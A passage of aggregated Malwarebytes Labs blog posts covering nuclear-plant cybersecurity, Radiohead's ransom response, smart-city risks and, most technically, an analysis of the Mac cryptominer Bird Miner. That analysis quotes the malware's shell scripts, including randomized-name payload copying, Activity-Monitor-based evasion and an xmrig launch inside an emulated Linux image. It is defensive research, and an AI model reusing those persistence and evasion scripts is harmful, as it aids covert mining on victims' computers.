A year later, the NRC introduced the Regulatory Guide 5.71, a series of “best practices” it developed with input from the Department of Homeland Security, the Institute of Electrical and Electronics Engineers, the International Society of Automation, the National Institute of Standards and Technology, and the Nuclear Energy Institute. Each plant’s plan must hit eight milestones, which include creating a cybersecurity assessment team; identifying different cybersecurity levels and figuring out which devices need to be on each level; and protecting devices from portable media like thumb drives.

Threats such as Slammer “are probably equivalent” in scope to those at non-nuclear facilities, says F. Mitch McCrory, an internationally recognized cybersecurity expert who currently manages the Risk and Reliability Analysis Department in Sandia National Laboratories’ Energy, Earth, and Complex Systems Center. All power plants must be concerned with cyberattacks such as insider threats, software and hardware supply chain attacks, and hackers remotely accessing the network. But considering a disaster like Chernobyl, he says, nuclear-facility operators must “do cybersecurity better than other places.”

Layered security to stop hackers

In his 1990 book on nuclear energy, Bernard Leonard Cohen, a professor emeritus of physics at the University of Pittsburgh, wrote that “post-accident analyses indicate that if there had been a US-style containment in the Chernobyl plant, none of the radioactivity would have escaped, and there would have been no injuries or deaths.”

That was before critical-infrastructure hacks became common. Stricter regulations on US nuclear-power facilities implemented since then include a requirement that the networks connecting nuclear-power machinery be separate from the business side of the facility. Nuclear facilities are also required to use one-way data diodes to control the flow of information from monitoring devices to central computers controlling the plant.

Bumper cars that were part of the amusement park in the now-abandoned town of Pripyat, Ukraine, home to more than 49,000 people when it was fully evacuated following the disaster. Photo by Seth Rosenblatt/The Parallax

“Digital instrumentation diodes prevent communication from the business network into the control system network. It mostly removes the threat vector of trying to hack into the system through the business network,” McCrory says, because there’s no way to send data back to its source—which is possible over traditionally used copper wiring. “And control system networks have digital-asset monitoring, to scan all devices for malware.”

There are procedural protections in place as well, Toecker says. Hardware and software updates must be tested on remote systems. Any software code written by a nuclear engineer for a nuclear facility must be reviewed by other engineers who have no relationship to the author. Software from an outside vendor must go through a source verification process, which can involve a hash check or software signature check, depending on the kind of software. Update installations must be documented. And depending on the type of update or the status of the facility, other precautionary procedures might come into play.

“We started doing [this] in 2012,” Toecker says. “The rest of the power industry is only getting to that now.”

Cybersecurity holes still remain

Even after taking every imaginable precaution, no computerized system is ever hack-proof, and there is still plenty for the nuclear-power industry to improve on, says Bryan Owen, cybersecurity manager at enterprise data management software maker OSIsoft, whose software is used by nuclear facilities across the world to manage streams of monitoring data.

Top on his list is exporting US standards to other countries, not all of which have such strict regulations in place. In the United States, “regulators, standards organizations, government departments, customers, partners—they all rolled up their sleeves for years to develop the nuclear-cybersecurity regulations,” he says. “OSIsoft has almost 50 percent market share globally, and I’ve visited facilities all over the world. But I haven’t seen this replicated.”

Owen would also like available data on “near-misses,” when something goes wrong but doesn’t result in a significantly notable event. “This has proven to be a constructive approach in aviation safety,” he says, but remains “elusive” for critical infrastructure.

A hidden Soviet Duga array, an over-the-horizon radar system for detecting missile attacks, was revealed to the public in the aftermath of the Chernobyl nuclear disaster. Photo by Seth Rosenblatt/The Parallax

Nuclear-power facilities across the world also must contend with issues related to aging: Equipment can easily last “12 to 15 years,” Toecker says, but older equipment connected to networks can be harder to protect, as vendors discontinue product lines or go out of business.

In his 2016 report on cybersecurity and nuclear-power facilities, engineering and automation specialist Béla Lipták lays out the challenges in getting facility operators to protect customers.

“We also know that for financial reasons, and because of management convenience, the whole nuclear industry is drifting toward installing completely digital controls to allow the remote operation of some plant functions,” he writes. To protect consumers from hackers disrupting plant operations, he says the NRC must mandate “totally separating the corporate business networks from the plant networks, and to realize that digital firewalls do not guarantee this separation.”

That last bit of guidance is not clearly stated in US regulations of nuclear-power plants. And although data diodes may isolate the sensors that measure the plant’s functions from the plant’s operations network, industrial control system cybersecurity expert Joe Weiss says regulations should specify that sensors have on-board cybersecurity protections to stop data manipulation at the source. In most cases, he says, they don’t.

“If you can’t trust what you measure, you’re in pretty sad shape,” Weiss says. “If the sensor has remote communication capability, whether wired or wireless, it can be vulnerable. We made our systems accessible without truly understanding what that meant.”

Sensor vulnerability strikes at the core of Weiss’ concerns about nuclear power plant safety, especially as overwhelmed sensors made the Three Mile Island incident in 1979 much harder to stop.

“If what you’re measuring is not correct, your actions based on that are not going to be correct. If you’re a doctor, and you can’t trust your temperature or blood pressure reading, how can you make a good diagnosis?” he asks. “When you talk about sensors, that’s the heart of safety.”

High cost of failure

The Chernobyl plant, today covered in a 350-foot-high, 840-foot-wide metal-and-concrete sarcophagus, stands as a sober monument to the importance of prioritizing community security and safety.

For all of the damage the Chernobyl disaster wrought, it is rife with warning signs, ones anybody can go see for themselves, of what can happen when politics or profits trump safety protocol: the abandoned buildings of the former Chernobyl employee village of Pripyat; the exposure of a once-hidden missile-detecting radar array (view our photos of the Duga array above); and hundreds of sadly untouchable stray dogs.

In the years that followed the Chernobyl disaster, the NRC decided over a series of at least three reports that there were few safety improvements, if any, for the United States to make at its reactors. After participating in a select scientific panel analyzing what happened, the Nobel laureate and American physicist Hans Bethe told Richard Rhodes for his book on Chernobyl, “the Chernobyl disaster tells us about the deficiencies of the Soviet political and administrative system rather than about problems with nuclear power.”

Weiss remains concerned about the security of nuclear plants in the United States and abroad because the stakes are so high.

“This isn’t a data breach,” he argues. “This is blowing things up.”

The post Chernobyl’s lessons for critical-infrastructure cybersecurity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Radiohead’s ransom response shows novel approach for ransomware victims

Malwarebytes - Thu, 06/20/2019 - 17:20

Last week, British rock band Radiohead thwarted an attempted digital ransom, in which unnamed hackers stole roughly 18 hours of unreleased music dating back to the band’s recording of its studio album OK, Computer, revealing some less-than-ok computer security (sorry).

Instead of paying a ransom to keep the music secret, Radiohead released the files themselves, giving listeners a chance to stream the content for free, or download it for £18. All proceeds will go to the organized political group Extinction Rebellion, which fights to address climate change.

As digital ransoms and straightforward ransomware attacks continue to plague companies, organizations, and entire cities, a handful of victims, like Radiohead, are taking novel approaches, often refusing to pay.

But these approaches work for few victims, said Bill Siegel, co-founder of CoveWare, which helps ransomware victims rebuild their databases and negotiate with ransomware hackers if necessary.

“I think what Radiohead did was an amazing thing, but the content they had was for public consumption to begin with, unlike a private company’s data, which is never for public consumption,” Siegel said. “You have to draw that distinction. Every case is unique.”

For everyone who isn’t Radiohead, fret not, as there are several other creative solutions when recovering from a ransomware attack.

Ransoms, ransomware, and responses

Ransomware attacks continue to threaten and destabilize small and large businesses, and, according to recent data from CoveWare, the actual ransom amounts demanded are increasing dramatically. In the first quarter of 2019, CoveWare found that ransom amount demands increased 90 percent, with the average amount demanded after a Ryuk ransomware attack hitting $286,556. The average ransomware attack downtime is 7.3 days, and the average cost of that downtime is $64,645.

For Radiohead, the band was told to pay $150,000 or risk having the 18 hours of stolen music released online. On June 11, Radiohead guitarist Jonny Greenwood announced the ransom attempt on Facebook, along with the band’s subsequent ransom refusal. Judging by his words, the whole affair seemed tedious.

“[I]nstead of complaining—much—or ignoring it, we’re releasing all 18 hours on Bandcamp in aid of Extinction Rebellion,” wrote Greenwood. “Just for the next 18 days. So for £18 you can find out if we should have paid that ransom.”

The band’s description of the recorded material is even more mundane:

“it’s not v interesting
there’s a lot of it.”

(The Guardian gave it four out of five stars.)

Less than one week after Greenwood’s announcement, another potential digital ransom victim refused to back down.

On June 15, actress Bella Thorne told her followers on Twitter that, after a hacker attempted to blackmail her with stolen nude photos, she was going to post those photos herself.

“I’m putting this out because it’s my decision. Now you don’t get to take yet another thing from me,” Thorne wrote in a note posted on Twitter. “I can sleep better knowing I took my power back. You can’t control my life, you never will.”

Thorne’s response echoed another blackmail attempt that was shut down earlier this year by Amazon CEO Jeff Bezos. Following the National Enquirer’s exposé into Bezos’ affair with a television anchor, which revealed several surreptitiously-obtained private messages, Bezos hired a private investigator to look into how his private texts were leaked to the supermarket tabloid. Weeks into the investigation, Bezos said he was offered a proposition by the paper’s owner: Stop his investigation or suffer the publishing of more intimate details, including one “below-the-belt selfie.”

Bezos did not buckle. Instead, he wrote on Medium about his back-and-forth with the National Enquirer’s owner, AMI.

“Of course I don’t want personal photos published, but I also won’t participate in [AMI’s] well-known practice of blackmail, political favors, political attacks, and corruption,” Bezos wrote. “I prefer to stand up, roll this log over, and see what crawls out.”

Bezos, Thorne, and Radiohead all responded the same way—they flipped the situation, turning themselves from victims into champions.

“I don’t love @JeffBezos in general, but I LOVE Jeff Bezos in particular here,” wrote Silicon Valley journalist Kara Swisher on Twitter.

“Bella Thorne steals hackers thunder,” wrote one cybersecurity blog.

“Radiohead Just Took On Ransom Hackers—And Won,” read the headline for Forbes.

Siegel said Radiohead’s response “defused” the situation.

“That’s an important word when it comes to public ransomware incidents,” Siegel said. “It is the ability to control the narrative and defuse it. It makes a big difference in the perception of how it was handled.”

But when it comes to how organizations have responded to actual ransomware—which is not the same as the above examples—the publicized results have been less empowering.

Ransomware attacks are unlike the threat made against Radiohead, making the responses to them potentially more complicated. Ransomware authors often target a large organization, deploying malware that encrypts all the files stored on a machine, leaving them indecipherable and completely useless unless decrypted.

Ransomware attackers then give victims a choice: Pay up and get the decryption key, or, lose access to all your files forever.

Recently, one ransomware victim chose the latter.

In April, a two-surgeon medical practice in Michigan shut down early—about one year before the doctors’ planned retirement—after getting hit with a string of ransomware that locked all patient files behind a guarded decryption key. Medical records, bills, and patient appointments were all inaccessible after the attack.

The two doctors decided against paying the demanded $6,500 ransom, because, according to an interview with the Star Tribune, there was no guarantee the decryption key would work or that the ransomware wouldn’t be deployed against them again.

The lost appointment calendar led to one of the doctors staying in the office simply to cover all the upcoming—but unviewable—appointments.

“We didn’t even know who had an appointment in order to cancel them,” one of the surgeons told the Star Tribune. “So what I did was just sort of sat in the office and saw whoever showed up. For the next couple of weeks.”

This outcome, Siegel said, is not desired.

“It’s not super responsible,” Siegel said. “There are still patients who want their records, and they can’t get them anymore.”

Another ransomware victim that failed to appropriately respond is the City of Baltimore.

In early May, threat actors deployed the ransomware RobbinHood against 10,000 computers used by the City of Baltimore, locking city services into digital gridlock. As of June 5, only one third of the city’s employees had received new logins, and the process to obtain new credentials required in-person visits. Some email and phone services had been restored, city officials said, but much of the city’s payment processes were still relegated to manual efforts. Residents’ water bills would be higher in the future, said one official, because the smart meters could not accurately capture water usage for the past month. Parking tickets needed to be paid in person, with the physical ticket in hand.

All accounted, the cost of the ransomware attack would hit $18 million, with $10 million devoted to cleanup and $8 million lost from downtime. The original ransom amount demanded was 13 Bitcoin, or about $116,000 today.

“If you look at Baltimore, it’s a case study of what not to do, across the board,” Siegel said. “If you don’t have a plan, and you make that very obvious, in public, you’re just thrashing around.”

Turning panic into progress

Two weeks ago, we gave users a rundown on how to prepare for a ransomware attack on their systems. While useful, the guide focuses on preparation—after all, the best way to protect against ransomware is to prevent it from happening in the first place.

But what about the company that has already been hit with a ransomware attack? What about a mid-sized business that doesn’t have the resources of the world’s richest man (Bezos), the popularity of the band that made the often-named most influential record of the current millennium (Radiohead), or the courage to post revealing information about themselves, detractors be damned (Thorne)?

What options are left for businesses that can’t shut down overnight, can’t afford to spend $18 million on recovery, and still refuse to pay a ransom?

There are many options, Siegel said. Further, these options are just as ingenious as every example listed, just maybe not as flashy.

“It’s not as fun a story, but the practical reality of recovery in lieu of paying involves a lot of creativity,” Siegel said. He said that, for CoveWare’s many clients, if there is ransom on the table to pay, “our stance is, it’s always the last resort.”

Immediately after a ransomware attack, Siegel said that company employees have three priorities in maintaining their business and limiting downtime: access to email, access to the Internet, and access to a file server to save and share their work.

As a business ensures that its employees can actually work in the following days, it can also start by rebuilding the data that is currently locked by a ransomware attack. There are many methods, and most of them aren’t high-tech. Instead, they’re clever, Siegel said.

“We’ve seen before that everybody gets their laptops, we’re talking 65 laptops in a room, and we start copying emails off of everybody’s Outlook accounts, literally to start rebuilding,” Siegel said. He said he has also seen employees going through all their email inboxes and outboxes and copying attached documents that were sent and received.

“It’s amazing where you can find copies of data,” Siegel said.

While the rebuilding process is happening, companies can also discuss the actual cost of paying a ransom or getting help to rebuild internal databases. For example, Siegel said, if a company has lost its QuickBook files through a ransomware attack, it can determine whether it makes more sense to spend, say $10,000 to $20,000 hiring local contractors to rebuild a database of invoices and accounts payable, rather than paying $100,000 for a ransom. Plus, Siegel said, a rebuilt database is a guarantee, whereas a paid ransom is not—according to CoveWare data, 96 percent of paid ransoms are honored.

The decision to pay off a ransom isn’t just economical, Siegel said. It’s also moral.

Siegel mentioned a client he spoke to who was hit with ransomware. The client’s insurance policy was going to cover the recovery cost (which is not always a guarantee), but the client was considering hiring contractors and local vendors to help rebuild his company’s database rather than paying the ransom. The cost to rebuild, Siegel said, would be about $300,000 to $400,000 for the client.

“The client said ‘Granted, it might take a month [to rebuild], versus paying [the ransom], which takes a day, but I’m going to put that money back into the local economy, hiring contractors and vendors, rather than shipping it over to criminals,’” Siegel said.

Paying a ransom is a last resort for many ransomware victims. But that doesn’t mean victims have to be completely undone by an attack. Instead, they can turn the tables, rebuilding from scratch, or doing their part to keep money out of criminals’ hands. Or, in the extremely unique case of Radiohead’s digital ransom, creating a revenue stream that never would have existed, and delivering that money straight to a social cause.

Perhaps the band was prophetic when, 16 years ago, it named its sixth studio album Hail to the Thief. But in the case of businesses and celebrities who refuse to pay the ransom, it’s more like Fail to the Thief.

The post Radiohead’s ransom response shows novel approach for ransomware victims appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Mac cryptominer Malwarebytes detects as Bird Miner runs by emulating Linux

Malwarebytes - Thu, 06/20/2019 - 15:33

A new Mac cryptocurrency miner Malwarebytes detects as Bird Miner has been found in a cracked installer for the high-end music production software Ableton Live. The software is used as an instrument for live performances by DJs, as well as a tool for composing, recording, mixing, and mastering. And while cryptomining is not new on Mac, this one has a unique twist: It runs via Linux emulation.

Miner behavior

The cracked Ableton Live 10 installer can be downloaded from a piracy website called VST Crack, and it’s more than 2.6 GB, a size that might be cause for alarm for other programs but is reasonable for such an app. However, on closer inspection, it’s clear this installer is doing some strange things. For example, Bird Miner’s postinstall script will, among other things, copy some installed files to new locations with randomized names:

#RANDOM
z1="$( /Users/Shared/randwd Software )"
z11="$( /Users/Shared/randwd )"
z111="$( /Users/Shared/randwd )"
z1111="$( /Users/Shared/randwd )"
z2="$( /Users/Shared/randwd Software )"
z22="$( /Users/Shared/randwd )"
z222="$( /Users/Shared/randwd )"
z2222="$( /Users/Shared/randwd )"
z3="$( /Users/Shared/randwd )"
z33="$( /Users/Shared/randwd )"
z3333="$( /Users/Shared/randwd )"
#CREATE DIRECTORIES
mkdir /Library/Application\ Support/$z1
mkdir /Library/Application\ Support/$z2
#Move Programs
cp /Users/Shared/z1 /usr/local/bin/$z1
cp /Users/Shared/z1.daemon /Library/Application\ Support/$z1/$z11
cp /Users/Shared/z1.qcow2 /Library/Application\ Support/$z1/$z111
cp /Users/Shared/z1 /usr/local/bin/$z2
cp /Users/Shared/z1.daemon /Library/Application\ Support/$z2/$z22
cp /Users/Shared/z1.qcow2 /Library/Application\ Support/$z2/$z222

This code uses a randwd script, placed during the install process, to generate random names from a wordlist:

WORDLIST='/usr/share/dict/web2'
TMP_FILE=$(mktemp -t wordlist)
[...]
# Allows user to pass initial charater to generator
grep -E '^[[:upper:]]' ${WORDLIST} | grep -Ev 'Nazism|Nazi|Hitlerism' > ${TMP_FILE}
WORDLIST=${TMP_FILE}
# Use jot to generate random number for line of file to extract
sed -n $(jot -r 1 1 $(wc -l < ${WORDLIST}))p ${WORDLIST}

Amusingly, the malware seems to want to avoid any mention of Nazis or Hitler—words that actually can be found in the wordlist. I guess even malware creators don’t want to be associated with the terms. Whoever wrote the filter didn’t really understand what the regular expression would match, though, as it’s longer than it needs to be.

The files that get dropped on the system, with random names, have a variety of functions. Three are launch daemons, charged with launching three different shell scripts.

One of the scripts launched is called Crax, and it installs in the /usr/local/bin/ directory. Crax is tasked with ensuring that the malware isn’t being snooped on by pesky security researchers. The first thing it does is check to see if Activity Monitor is running and, if it is, unload the other processes.

pgrep "Activity Monitor" if [ $? -eq 0 ]; then launchctl unload -w /Library/LaunchDaemons/com.Flagellariaceae.plist launchctl unload -w /Library/LaunchDaemons/com.Dail.plist else

If Activity Monitor isn’t running, the malware then goes through a series of CPU usage checks. If the results show that it’s pegging the CPU at more than 85 percent, it again unloads everything.

A=`ioreg -c IOHIDSystem | awk '/HIDIdleTime/ {print $NF/1000000000; exit}'`
B=`echo $A / 1 |bc`
if [ $B -lt 120 ]; then
T=`ps -A -o %cpu | awk '{s+=$1} END {print s }'`
C=`sysctl hw.logicalcpu |awk '{print $2 }'`
D=`echo $T / $C |bc`
if [ $D -gt 85 ]; then
T=`ps -A -o %cpu | awk '{s+=$1} END {print s }'`
C=`sysctl hw.logicalcpu |awk '{print $2 }'`
D=`echo $T / $C |bc`
if [ $D -gt 85 ]; then
T=`ps -A -o %cpu | awk '{s+=$1} END {print s }'`
C=`sysctl hw.logicalcpu |awk '{print $2 }'`
D=`echo $T / $C |bc`
if [ $D -gt 85 ]; then
launchctl unload -w /Library/LaunchDaemons/com.Flagellariaceae.plist
launchctl unload -w /Library/LaunchDaemons/com.Dail.plist
fi
fi
fi
else

If all these checks pass, it loads the daemons for the other two processes. In our case, these are com.Flagellariaceae.plist, which runs a script named Pecora, and com.Dail.plist, which runs a script named Krugerite.

Interestingly, these two scripts are nearly identical, and each loads a separate executable, as shown below for the Krugerite script.

#!/bin/bash
function start {
pgrep "Activity Monitor"
if [ $? -eq 0 ]; then
launchctl unload -w /Library/LaunchDaemons/com.Dail.plist
else
/usr/local/bin/Nigel -M accel=hvf --cpu host /Library/Application\ Support/Nigel/Poaceae -display none
fi
}
start;

This script once again checks for Activity Monitor and bails out if it’s running, indicating that someone is watching for unusual processor activity. If it’s not open, then it launches an executable named Nigel, and passes a path to another file, Poaceae, as a parameter.

This is where things get interesting. It turns out that the Nigel file (and the corresponding file for the other script) is an old version of a piece of open-source software named Qemu.

Qemu is an open-source emulator, somewhat like a command-line-only VirtualBox, that is capable of running Linux executables on non-Linux systems. These copies of Qemu are being used to run the contents of image files, named Poaceae in the above example, using Apple’s Hypervisor framework for better performance.
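
Stripped of the randomized names, the launch amounts to an ordinary headless Qemu invocation. As a rough sketch (assuming the x86-64 system emulator binary and a placeholder image name, neither of which is confirmed by the samples), the equivalent command would look something like this:

# Boot a Linux disk image with no visible window, using macOS Hypervisor.framework
# (hvf) acceleration, mirroring the flags seen in the malware's own scripts
qemu-system-x86_64 -M accel=hvf --cpu host linux-image.qcow2 -display none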

The final piece of the puzzle lies inside the Poaceae file. This file is a QEMU QCOW image file:

test$ file /Users/test/Library/Application\ Support/Nigel/Poaceae
/Users/test/Library/Application Support/Nigel/Poaceae: QEMU QCOW Image (v3), 527400960 bytes

This is a file format somewhat similar to Apple’s disk image (.dmg) format, but specific to Qemu, and not as easy to open. With some work, however, it is possible to peek inside the Poaceae file. In this case, the image contains a bootable Linux system. The specific variant of Linux that it uses is Tiny Core.
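
One way to take that peek (a sketch of my own, not necessarily the exact steps used in this analysis) is with the qemu-img utility that ships with Qemu, which can report on the image and convert it to a raw disk that standard forensic tools understand; poaceae.raw below is just a placeholder output name:

# Show format, virtual size, and other header details of the QCOW image
qemu-img info Poaceae
# Convert the QCOW image to a raw disk image for further examination
qemu-img convert -O raw Poaceae poaceae.raw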

Image captured by opening the Poaceae file with Qemu, using different command-line parameters

The image also contains a mydata.tgz file, referenced in the screenshot above, which is used to load certain files at startup. One of those files is /opt/bootlocal.sh, which contains commands to run when the Tiny Core system starts up. In this case, that bootlocal.sh file contains commands to get xmrig up and running.

#!/bin/sh
# put other system startup commands here
/mnt/sda1/tools/bin/idgenerator 2>&1 > /dev/null
/mnt/sda1/tools/bin/xmrig_update 2>&1 > /dev/null
/mnt/sda1/tools/bin/ccommand_update 2>&1 > /dev/null
/mnt/sda1/tools/bin/ccommand 2>&1 > /dev/null
/mnt/sda1/tools/bin/xmrig

Thus, as soon as the Tiny Core system boots up, xmrig launches without ever needing a user to log in. As soon as the system shown in the screenshot above asks for the “box login,” the miner is already running.

The xmrig software has been abused multiple times recently by Mac cryptominers, such as DarthMiner. However, Bird Miner is an interesting case, as the copy of xmrig being used here is a Linux executable run in emulation via Qemu.

Distribution

The malware was first spotted in a pirated Ableton Live 10 installer. Since then, we’ve found additional Bird Miner installers for other software, all distributed through the same site. All such installers drop the same malware, though the exact install process may vary slightly.

However, a Reddit thread on piracy discussing the safety of the VST Crack site revealed that this site has been distributing this malware in some form for at least four months, probably longer.

Sure enough, a couple older installers were found on VirusTotal that used the same technique, but did not yet use random file names.

Implications

Bird Miner malware is somewhat stealthy, as it will bail out at multiple points if Activity Monitor is running, and it effectively obfuscates the miner code by hiding it inside Qemu images.

However, it also shoots itself in the foot, stealth-wise, by using quite obvious launch daemons for persistence, and by using shell scripts to kick everything off. These things don’t reveal the intent of the malware, but it’s pretty easy for a savvy user to notice that something suspicious is going on.
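
For instance (my own suggestion, not a step from the analysis above), a quick look at the system-wide launch daemons is enough to surface the oddly named property lists and check whether their jobs are loaded:

# List system-wide launch daemons and look for unfamiliar entries
ls -l /Library/LaunchDaemons/
# Check whether the suspicious jobs are currently loaded
sudo launchctl list | grep -i -e Flagellariaceae -e Dail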

More interesting is the fact that the malware runs via emulation, when it could easily have run as native code. This would have given the malware better performance and a smaller footprint. Further, the fact that the malware runs two separate miners, each running from their own 130 MB Qemu image file, means that the malware consumes far more resources than necessary.

The fact that Bird Miner was created this way likely indicates that the author is familiar with Linux, but is not particularly well-versed in macOS. Although this method does obfuscate the miner itself, which could help the malware evade detection, that benefit is countered by the reliance on shell scripts and the heavy footprint of running not one but two miners simultaneously in emulation.

Obviously, this malware provides a solid example of why piracy is not a good idea. If you’re engaging in piracy, you’re likely to get infected, even with antivirus software installed. Like a railing on a bridge, antivirus software can protect you, but it’s much less effective if you’re actively jumping the rail and engaging in risky behavior.

Malwarebytes for Mac detects this malware as OSX.BirdMiner.

IOCs

/usr/local/bin/Crax: 3dca4365b5ea280b966541d53eaee665e2b915a668dd34a1ae208595bc83dbda
/usr/local/bin/Nigel: 5c314b493d6ad5df84450e190b94a9ff67e79ca125a322a65b465ee171b6e638
/Library/Application Support/Nigel/Krugerite: 390e9a6d4a6f6c9a553aaa6543058931d14cfdc2620732bbfac73fd90eaf09ee
/Library/Application Support/Nigel/Poaceae: 7e36222a3e3898d9473f017c33c803ad70878fa79f391a65d87ae061cb89fba7
one of the smallest installers: dfbe4d61118aef6464a2fe17cbf882d4a0f3fdb81e58d99aa7114a553b42a66d

The post New Mac cryptominer Malwarebytes detects as Bird Miner runs by emulating Linux appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs report: Malicious AI is coming—is the security world ready?

Malwarebytes - Wed, 06/19/2019 - 15:00

Imagine a world in which artificial intelligence has gone rogue—the robots have revolted against their masters and have now enslaved all of humanity. There’s no more natural beauty in the world and everything is awful.

Get that out of your system? Good.

The reality of malicious AI, at least in the near future, is far less dystopian. However, it is a reality, and it’ll be here sooner than people might think. As with all disruptive technology, blissful early adoption is soon followed by abuse. And if cybercriminals know one thing, it’s how to profit off a trend.

Therefore Malwarebytes Labs’ latest report takes a pragmatic approach to evaluating the dangers of AI and machine learning (ML), looking at exactly how these technologies are being used today, their benefits, and our concerns for near-future abuse. Why? So that developers, security professionals, and other organizations can incorporate AI responsibly and guard against potential attacks.

Without further ado, we present:

When artificial intelligence goes awry: separating science fiction from fact

The post Labs report: Malicious AI is coming—is the security world ready? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Smart cities, difficult choices: privacy and security on the grid

Malwarebytes - Tue, 06/18/2019 - 17:17

All is not well in the land of smart city planning, as the latest major planned development from Google’s sister company Sidewalk Labs continues to run into problems in Toronto, Canada.

A groundswell of support?

Building a city “From the ground up” is apparently no longer a thing: at least some folk with a hand in digital urban design are saying it’s “From the Internet up” now. The plan was to take Toronto’s waterfront and transform it into an innovative smart city location. Sidewalk Labs got the contract to design a big chunk of Toronto’s waterfront in 2017, with potential for expansion.

New tech and an eye for environmentally friendly design should have been the icing on the cake. Instead, continued delays in revealing what is happening are leading to complaints and to protest groups like Block Sidewalk, which aren’t happy with the direction things have taken.

A bump in the road

As it turns out, planning something like a smart city is incredibly complicated, and things appear to be slipping behind schedule. Worse, nobody seems to be able to tell the residents exactly what’s coming in this brave new world of digital connectedness. Google’s Sidewalk Labs wants to set a “global standard” for how user data should be treated, but there’s still no real information available as to how this will work in practice.

Interestingly, it’s the data privacy concerns now primarily coming to the fore, as bigger tech critics weigh in. It’s no fun when your project is on the receiving end of comments like, “A colonizing experiment in surveillance capitalism” or “…a dystopian vision that has no place in a democratic society,” especially if your main aim was to build some wood paneled houses and a functional drainage system.

Various resignations from the advisory panel, including that of the former privacy commissioner of Ontario, who stated, “I imagined us creating a smart city of privacy as opposed to a smart city of surveillance,” have definitely not helped to smooth out concerns.

The clear signifier is that early buy-in is crucial in getting one of these projects off the ground. Without an early affirmation of what to expect, people will dig their heels in and say no regardless of what’s on offer.

Puebla, in east-central Mexico, is a good example of this: it has 15 locations slated to become smart cities. One of them, Santa Maria Tonantzintla, has essentially refused to go any further after a lack of information as to what’s coming next. Demolishing some local landmarks certainly didn’t help matters. I would’ve linked to the 15 cities project, but the website is offline, which may or may not be very on brand for this kind of enterprise.

What is a smart city?

Good question, and one we may take for granted. Defining a smart city can be an exercise in frustration, but experts broadly peg them as one of two distinct flavours: top down, and bottom up.

Top down smart cities

These are major projects put together through a combination of governments, city councils, and major technology vendors. Ideally, an entire city is constructed from nothing, with the essential technology backbone required to make it all work in place from the outset.

Someone, somewhere sits Wizard-of-Oz style with a large control bank ensuring every aspect of day-to-day living works seamlessly—from trash collection and street lighting to traffic flow management and energy use.

That’s how it pans out in an ideal world with no need to worry about things going wrong, anyway. As you’ll see shortly, things tend to go wrong quite a bit. For now, let’s look at the next style of smart city.

Bottom up smart cities

This is what people who live in a city get up to when left to their own devices (pun probably not intended). Crowdfunders, crowdsourcing, smaller disruptive organisations working with communities to make things work more efficiently; it’s all here, and it’s as potentially chaotic as you’d imagine.

Piecing the puzzle together

Of course, it’s usually tricky to slap a city together from scratch and be home in time for supper—most of our towns and cities are already here with us. What we mostly have is a haphazard assemblage of council-led approaches bolted onto crumbling infrastructures while independent apps and community projects simultaneously do their own thing. The residents are by and large caught in the middle of this ebb and flow, and there’s never a real guarantee any of it is going to work as expected.

Smart city shenanigans

Despite their best efforts, projects can and do run into troublesome situations. Many of them aren’t even strictly security related; you’re probably more likely to fall victim to negligence or poor planning. Even so, the end result is still the same, whether or not someone hacked the Gibson, and a problem will still cause headaches. Below, we look at a few issues facing both top and bottom styles of smart city.

Top down smart city problems

1) In the UK, Westminster ran into issues when the company managing the city’s street lights went into administration. With nobody at the lightbulb wheel, residents were amazed to find some 8,000 street lights blasting away 24/7 for an entire week. The local council had to pay a “small fee” to the new company administrators to get things resolved.

While you’d think a contingency plan would be in place for a contract blowing up at this level, it somehow ended up being missed. Nobody wants to go to bed with the glare of typically much brighter smart bulbs pouring in through the window, not to mention the power drain and environmental impact. A simple but effective example of how top down sometimes gets it wrong.

2) What if an entire neighbourhood’s identity vanished from online maps to the extent that its data-driven invisibility meant you might never find it? That’s exactly what happened to the community of the Fruit Belt, aka “Medical Park,” courtesy of bad data not only from Town Hall but also from a variety of mapping startups, tech orgs, and data brokers.

The residents’ fight to reclaim both the name and the location’s acknowledgement as a physical space is quite something. As with Westminster and their 24/7 lights, we see another situation where defunct companies leave unforeseen problems in their wake with nobody to play clean-up.

3) There’s also the threat from hacks in a top down system; control the hub, control the city. Exposed devices, default passwords, vulnerabilities, and critical flaws—all ready and waiting for someone to come along and take advantage. You expect a street light to break or a pipe to burst. What you don’t expect is people tampering with early warning systems or road signs displaying random messages.

4) Sticking with that same theme, a lot of work has been done in this area by the Securing Smart Cities project, which looks at ways companies, governments, media outlets, and more can work together to address these concerns. Amongst other things, they’ve done smart research on how CCTV systems can be a danger from something as banal sounding as not covering up labels. They’ve also explained how bad actors could scale up attacks to (for example) knock out air conditioners across multiple streets or an even bigger radius with the aid of some $50 equipment. That may not sound like a big deal, but in hot weather it could be potentially lethal for the sick or elderly.

5) Hong Kong residents protesting the proposed extradition law chose to avoid using their Metro cards for travel for fear of being tracked by the government. Instead, they opted for cash payments, as tourists tend to do. That travel data has been used in the past for law enforcement, so one can understand their apprehension. In a place where even advertising has been used to name and shame litterbugs via DNA, this raises potent questions about where, exactly, power lies when so much of our day-to-day existence is at the whim of top down systems.

Bottom up smart city problems

1) Tracking in the age of smart tech is something people are naturally concerned about. When I looked at the hacking simulation NITE Team 4, I mentioned tracking someone’s phone via smart billboards. I was particularly taken by this appearing in a video game, because it’s a supposedly out-there concept that doesn’t sound real but (shocker) it is.

Wandering the streets, whizzing by in a car, walking around some shops? If your Wi-Fi is enabled, it’s quite possible you’re being tracked for marketing purposes.

2) What happens when your landlord and/or building complex decides the time has come for everybody to receive smart locks whether they want them or not? Chaos is what happens. Not everybody is a fan of taking control of basic functions like premises security away from the resident, and there are multiple compelling reasons for not having them installed.

Case in point: What if there are potential security issues? What happens if the power goes down while there’s an apartment fire? What if the locks just stop working while you’re asleep? Who has access to the data? Before you know it, it’s all gone a bit legal and some people in suits are probably shouting a lot.

3) Of course, we can’t go on without mentioning the increasingly large mess that is IoT/smart home technology and domestic abuse cases. It’s a chilling example of what can go wrong when too many random technologies are mashed together in real-world settings with a malicious actor in the middle.

Quite often, there’s zero chance of the abused person being able to figure out where bad technology things are happening, and it can be a challenge for tech experts familiar with these issues to find a decent starting place for their investigation.

Sandcastles in the sea

We’re scratching the surface here, but there’s a lot to take in where constructing a smart city is concerned, whether government-led or built by people doing it themselves. There are also some huge success stories in smart city land—it’s not all disasters, broken street lamps, and road signs yelling about zombie outbreaks.

